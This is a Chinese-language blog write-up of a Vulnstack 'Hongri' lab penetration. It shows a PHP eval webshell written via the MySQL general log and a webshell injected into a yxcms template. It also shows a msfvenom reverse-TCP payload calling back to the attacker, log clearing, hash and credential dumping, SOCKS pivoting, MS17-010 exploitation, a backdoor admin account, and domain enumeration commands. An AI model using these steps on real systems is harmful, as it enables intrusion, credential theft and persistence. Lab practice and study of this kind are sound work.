type
status
date
slug
summary
tags
category
icon
password
😀
闲着没事打了一下红日靶场,打了时间有点长(太菜了),便记录一下过程
 

📝 红日靶场

红日靶场

参考文章:
ATT&CK红队评估(红日靶场一) - FreeBuf网络安全行业门户
红日(vulnstack)安全实战靶场 | Justin博客 (alexjakin.github.io)
msf手册 - 知乎 (zhihu.com)
三层网络靶场搭建&MSF内网渗透 - 网安 (wangan.com)
实战 | 记一次基础的内网Vulnstack靶机渗透一 (qq.com)

主机发现

受害主机: 192.128.52.128
kali: 192.128.52.129
win攻击机: 192.128.52.133 (192.168.235.145)
ubuntu攻击机器: 192.128.235.149
└─$ nmap -sn  192.168.52.0/24              
Starting Nmap 7.93 ( https://nmap.org ) at 2023-08-21 10:59 EDT
Nmap scan report for 192.168.52.128
Host is up (0.0020s latency).
Nmap scan report for 192.168.52.129
Host is up (0.00067s latency).
Nmap scan report for 192.168.52.141
Host is up (0.0061s latency).
Nmap done: 256 IP addresses (3 hosts up) scanned in 19.88 seconds


-sn:只做ping扫描,不做端口扫描
 

全端口扫描

└─$ nmap --min-rate 10000 -p- 192.168.52.128 
Starting Nmap 7.93 ( https://nmap.org ) at 2023-08-21 11:02 EDT
Nmap scan report for 192.168.52.128
Host is up (0.023s latency).
Not shown: 65533 filtered tcp ports (no-response)
PORT     STATE SERVICsE
80/tcp   open  http
3306/tcp open  mysql

Nmap done: 1 IP address (1 host up) scanned in 30.51 seconds
 

tcp扫描

└─$ sudo nmap -sT -sV -O -p 80,3306 192.168.52.128
[sudo] password for kali: 
Starting Nmap 7.93 ( https://nmap.org ) at 2023-08-21 20:43 EDT
Nmap scan report for 192.168.52.128
Host is up (0.0019s latency).

PORT     STATE SERVICE VERSION
80/tcp   open  http    Apache httpd 2.4.23 ((Win32) OpenSSL/1.0.2j PHP/5.4.45)
3306/tcp open  mysql   MySQL 5.5.53
MAC Address: 00:0C:29:1E:5F:3E (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Microsoft Windows Vista|2008|7
OS CPE: cpe:/o:microsoft:windows_vista::- cpe:/o:microsoft:windows_vista::sp1 cpe:/o:microsoft:windows_server_2008::sp1 cpe:/o:microsoft:windows_7
OS details: Microsoft Windows Vista SP0 or SP1, Windows Server 2008 SP1, or Windows 7, Microsoft Windows Vista SP2, Windows 7 SP1, or Windows Server 2008
Network Distance: 1 hop

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 27.71 seconds
 
 

udp扫描

(base) ┌──(kali㉿kali)-[~]
└─$ sudo nmap -sU -p 80,3306 192.168.52.128   
Starting Nmap 7.93 ( https://nmap.org ) at 2023-08-21 20:46 EDT
Nmap scan report for 192.168.52.128
Host is up (0.00072s latency).

PORT     STATE         SERVICE
80/udp   open|filtered http
3306/udp open|filtered mysql
MAC Address: 00:0C:29:1E:5F:3E (VMware)

Nmap done: 1 IP address (1 host up) scanned in 14.47 seconds
 
 

web服务

 

后台扫描

(base) ┌──(kali?kali)-[~]
└─$ sudo feroxbuster -u http://192.168.52.128 -d 1 -w /usr/share/dirb/wordlists/common.txt

 ___  ___  __   __     __      __         __   ___
|__  |__  |__) |__) | /  `    /  \ \_/ | |  \ |__
|    |___ |  \ |  \ | \__,    \__/ / \ | |__/ |___
by Ben "epi" Risher ??                 ver: 2.10.0
───────────────────────────┬──────────────────────
 ??  Target Url            │ http://192.168.52.128
 ??  Threads               │ 50
 ??  Wordlist              │ /usr/share/dirb/wordlists/common.txt
 ??  Status Codes          │ All Status Codes!
 ??  Timeout (secs)        │ 7
 ??  User-Agent            │ feroxbuster/2.10.0
 ??  Config File           │ /etc/feroxbuster/ferox-config.toml
 ??  Extract Links         │ true
 ??  HTTP methods          │ [GET]
 ??  Recursion Depth       │ 1
───────────────────────────┴──────────────────────
 ??  Press [ENTER] to use the Scan Management Menu?
──────────────────────────────────────────────────

301      GET        7l       20w      241c http://192.168.52.128/phpmyadmin => http://192.168.52.128/phpmyadmin/
301      GET        7l       20w      241c http://192.168.52.128/phpMyAdmin => http://192.168.52.128/phpMyAdmin/
200      GET      949l     4793w    70877c http://192.168.52.128/phpinfo.php

200      GET      401l      853w    14770c http://192.168.52.128/l.php
200      GET      401l      853w    14770c http://192.168.52.128/
 

php探针:/

notion image
 
 

phpinfo:/phpinfo.php

notion image
 

phpmyadmin:/phpmyadmin

notion image
存在弱口令:root/root
 
查看是否有文件写入权限

SHOW GLOBAL VARIABLES LIKE '%secure%'
notion image
 
查看是否有开启日志记录
SHOW GLOBAL VARIABLES LIKE '%general%'
notion image
显示未开启
 
手动打开
SET GLOBAL general_log = ON
notion image
修改日志路径
SET GLOBAL general_log_file = 'C:/phpstudy/WWW/test.php'
notion image
 
访问/test.php
notion image
 
日志写马
select '<?php eval($_POST[cmd]);?>'
notion image
这里其实是已经写进去了,一句话木马的重点在于木马执行,不要看到notice,没显示一句话木马就以为没有成功
 
使用蚁剑连接
notion image
在这里发现还有个站点yxcms
 
打开蚁剑终端查看权限
notion image
确认为系统权限
 

yxcms:/yxcms

notion image
文章后台,带默认账号密码
notion image
后台可以控制模板
notion image
此处可以修改模板代码,插入一句话木马
notion image
notion image
结合内容管理找到对应模板代码的位置
notion image
notion image
连接蚁剑
notion image
notion image

msf马

参考:msf手册 - 知乎 (zhihu.com)
 
生成木马
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.235.128 LPORT=10010 -f exe -o hack.exe
#攻击者(kali)ip和端口
蚁剑传马并且执行
notion image
msf监听
msfconsole
use exploit/multi/handler 
set payload windows/meterpreter/reverse_tcp 
set lhost 192.168.235.128     #攻击者ip(kali)
set lport 10010               #攻击者端口
exploit
notion image
上线,getuid查看用户
ps可以查看马子的进程(shell.exe是后面的cs马)
notion image
这里看见马子msf.exe进程pid是1028
notion image
apache的进程是4440
notion image

进程迁移

notion image
为了防止目标服务器检查到我们上传的hack.exe木马,我们可以将进程迁移到其他正常进程,
这里我的hack.exe木马进程id是1028,Apache进程是4440
 
然后清除痕迹clearev
notion image
 

关闭防火墙

run post/windows/manage/enable_rdp
notion image
 

开远程桌面

rdesktop 192.168.52.128
notion image
notion image
 

抓取hash

meterpreter > hashdump

结果:
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
liukaifeng01:1000:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
whoami:1001:aad3b435b51404eeaad3b435b51404ee:7fd6157f3589812ad3995dc56d1125d1:::
或者用自带模块
meterpreter > run post/windows/gather/smart_hashdump 

[*] Running module against STU1
[*] Hashes will be saved to the database if one is connected.
[+] Hashes will be saved in loot in JtR password file format to:
[*] /home/kali/.msf4/loot/20230823091624_default_192.168.235.150_windows.hashes_177787.txt
[*] Dumping password hashes...
[*] Running as SYSTEM extracting hashes from registry
[*]     Obtaining the boot key...
[*]     Calculating the hboot key using SYSKEY fd4639f4e27c79683ae9fee56b44393f...
[*]     Obtaining the user list and keys...
[*]     Decrypting user keys...
[*]     Dumping password hints...
[*]     No users with password hints on this system
[*]     Dumping password hashes...
[+]     Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[+]     liukaifeng01:1000:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[+]     whoami:1001:aad3b435b51404eeaad3b435b51404ee:7fd6157f3589812ad3995dc56d1125d1:::
 

使用kiwi(mimikazt平替)

kiwi模块同时支持32位和64位的系统,但是该模块默认是加载32位的系统,所以如果目标主机是64位系统的话,直接默认加载该模块会导致很多功能无法使用。所以如果目标系统是64位的,则必须先查看系统进程列表,然后将meterpreter进程迁移到一个64位程序的进程中,才能加载kiwi并且查看系统明文。如果目标系统是32位的,则没有这个限制
 
由于对象是64位win7,接下来要将进程迁移到其中一个64位程序
notion image
 
发现需要system权限后又转去了516进程
migrate 516
notion image
load kiwi
creds_all
notion image
 

msf搭建代理

ATT&CK红队评估(红日靶场一) - FreeBuf网络安全行业门户
①msf连接受害主机
msfconsole
use exploit/multi/handler 
set payload windows/meterpreter/reverse_tcp 
set lhost 192.168.235.128     #攻击者ip(kali)
set lport 10010               #攻击者端口
exploit
②新建路由
run post/multi/manage/autoroute
notion image
查看路由
run autoroute -p
notion image
挂起会话,建立socks
background #挂起会话
use auxiliary/server/socks_proxy
set VERSION 4a
set SRVHOST 127.0.0.1
options #查看使用的参数
exploit
notion image
成功后出现一个job(攻击任务)
notion image
jobs查看
notion image
修改proxychains.conf,如图
notion image
基本上参照上面你建立socks那一步的参数来添加进去
(其他教程用的是proxychains4.conf?我报错这里说用的是proxychans.conf)
notion image
使用代理只要像上面的指令前加上proxychains就可以了
 

扫描内网存活主机

use post/windows/gather/arp_scanner
set RHOSTS 192.168.52.0/24
set SESSION 1 #指定会话1(我图片指定了session2,session -l查看后台会话)
exploit
notion image
 
udp协议发现内网存活主机
use auxiliary/scanner/discovery/udp_sweep
set RHOSTS 192.168.52.0/24
exploit
notion image
 
结合来看,内网中有三台主机128(代理用的受害主机)、138、141
 

内网横移

不知道为什么我这一步扫出的端口很少
 
192.168.52.138
端口扫描
开放了25、110端口
扫描tcp:25,110端口
└─$ sudo proxychains nmap -sT -sV -O -p 25,110 192.168.52.138    
[sudo] password for kali: 
[proxychains] config file found: /etc/proxychains.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
Starting Nmap 7.93 ( https://nmap.org ) at 2023-08-30 11:41 EDT
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  192.168.52.138:110 <--socket error or timeout!
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  192.168.52.138:25 <--socket error or timeout!
Nmap scan report for 192.168.52.138 (192.168.52.138)
Host is up (0.0014s latency).

PORT    STATE  SERVICE VERSION
25/tcp  closed smtp
110/tcp closed pop3
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: DD-WRT v24-sp2 (Linux 2.4.37) (94%), Linux 3.2 (94%), Linux 4.4 (94%), Actiontec MI424WR-GEN3I WAP (92%), Microsoft Windows XP SP3 or Windows 7 or Windows Server 2012 (91%), Microsoft Windows XP SP3 (86%), Billion WRT610n WAP (85%)
No exact OS matches for host (test conditions non-ideal).

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 34.52 seconds
 
 
192.168.52.141
端口扫描
└─$ sudo proxychains nmap --min-rate 10000 -p- 192.168.52.141
[sudo] password for kali: 
[proxychains] config file found: /etc/proxychains.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
Starting Nmap 7.93 ( https://nmap.org ) at 2023-08-30 10:05 EDT
Nmap scan report for 192.168.52.141 (192.168.52.141)
Host is up (0.00064s latency).
Not shown: 65533 filtered tcp ports (no-response)
PORT    STATE SERVICE
25/tcp  open  smtp
110/tcp open  pop3

Nmap done: 1 IP address (1 host up) scanned in 18.84 seconds
开放了25、110端口
扫描tcp:25,110端口
 

永恒之蓝(测试,不知道为什么445端口没扫出来)

扫描192.168.52.141发现存在永恒之蓝
use auxiliary/scanner/smb/smb_ms17_010
set RHOSTS 192.168.52.141
exploit
notion image
漏洞利用
第一次尝试失败,模块一
use exploit/windows/smb/ms17_010_psexec
set payload windows/meterpreter/bind_tcp
set rhost 192.168.52.141
run
第二次尝试失败,模块二
发现只支持打64位系统,不支持32位
notion image
第三次尝试成功,模块三
notion image
 

新建用户‘hack’

net user hack qaz@123 /add #新建用户(要强密码并且不能包含用户名)
net user #查看用户
notion image
 
加入管理员组
set COMMAND net localgroup administrators hack /add
exploit
set COMMAND net localgroup administrators
exploit
notion image
 
 
后续开3386端口、使用telnet的过程没有成功。。。就不写上来了
 

其他

cs马

同样蚁剑传马,然后执行上线
sleep 0加快回显
由于受害机默认60秒进行一次回传,为了实验效果我们这里把时间设置成5,但实际中频率不宜过快, 容易被发现。
notion image
 
shell systeminfo查看信息
notion image
notion image

抓取密码

notion image
 

探测内网存活主机

notion image
for /L %I in (1,1,254) DO @ping -w 1 -n 1 192.168.52.%I | findstr "TTL="
 
 
 

内网信息收集

 ipconfig /all   # 查看本机ip,所在域
 route print     # 打印路由信息
 net view        # 查看局域网内其他主机名
 arp -a          # 查看arp缓存
 net start       # 查看开启了哪些服务
 net share       # 查看开启了哪些共享
 net share ipc$  # 开启ipc共享
 net share c$    # 开启c盘共享
 net use \\192.168.xx.xx\ipc$ "" /user:""    # 与192.168.xx.xx建立空连接
 net use \\192.168.xx.xx\c$ "密码" /user:"用户名"    # 建立c盘共享
 dir \\192.168.xx.xx\c$\user    # 查看192.168.xx.xx c盘user目录下的文件
 
 net config Workstation    # 查看计算机名、全名、用户名、系统版本、工作站、域、登录域
 net user                 # 查看本机用户列表
 net user /domain         # 查看域用户
 net localgroup administrators    # 查看本地管理员组(通常会有域用户)
 net view /domain         # 查看有几个域
 net user 用户名 /domain   # 获取指定域用户的信息
 net group /domain        # 查看域里面的工作组,查看把用户分了多少组(只能在域控上操作)
 net group 组名 /domain    # 查看域中某工作组
 net group "domain admins" /domain  # 查看域管理员的名字
 net group "domain computers" /domain  # 查看域中的其他主机名
 net group "doamin controllers" /domain  # 查看域控制器(可能有多台)

tasklist 查看有无其他杀毒进程
wmic useraccount get/all  查看是否存在域
 
notion image
该域名为god.org,域控为OWA$,域管理员为Administrator ,内网网段为192.168.52.1/24,我们用Ping命令探测域控的ip
 

域控ip

notion image
 

新增一个用户,并改为管理员

whami/Hongri
notion image
 

🤗 总结归纳

有很多地方还不够完善,比如端口扫描结果和其他教程的不一样(不知道是哪一步有问题),后续的维权没做完,开3386端口、使用telnet的过程没有成功等。。。

📎 参考文章

  • 一些引用
  • 引用文章
 
💡
有关Notion安装或者使用上的问题,欢迎您在底部评论区留言,一起交流~
Relate Posts
2023-12-05
记录第二次打红日靶场一
2023-06-28
jarbas—vulnhub
2021-07-02
wir3s靶机—vulnhub靶场
hyper-v虚拟机连接vmware虚拟机aira2使用分享
Catalog
0%